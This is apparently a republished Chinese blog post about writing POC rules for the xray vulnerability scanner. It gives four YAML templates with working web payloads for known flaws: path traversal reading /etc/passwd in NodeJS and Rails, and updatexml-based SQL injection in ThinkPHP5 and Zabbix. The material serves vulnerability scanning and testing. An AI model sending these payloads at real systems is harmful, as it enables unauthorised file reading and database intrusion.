xray写POC踩坑

Posted 17bdw

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了xray写POC踩坑相关的知识,希望对你有一定的参考价值。

错误记录

NodeJS_path-validation_CVE-2017-14849.yml


name: NodeJS_path-validation_CVE-2017-14849
rules:
  - method: GET
    path: /static/../../../a/../../../../etc/passwd
    headers:
      Accept: ''
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "NodeJS 8.5.0"
  links:
    - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849

Rails_file_content_disclosure_CVE-2019-5418

name: Rails_file_content_disclosure_CVE-2019-5418
rules:
  - method: GET
    path: /robots
    headers:
      Accept: '../../../../../../../../etc/passwd{{'
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

zabbix_3.0.3_jsrpc.php_CVE-2016-10134

  
name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
rules:
  - method: GET
    path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
  vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134

以上是关于xray写POC踩坑的主要内容,如果未能解决你的问题,请参考以下文章

Xray+burp联动使用(被动扫描)

独立部署Xray反练平台——详细说明加举例xxe漏洞

Xray-强大的漏洞扫描工具

关于poc脚本的一些问题

Xray安装与使用

华为云kafka POC 踩坑记录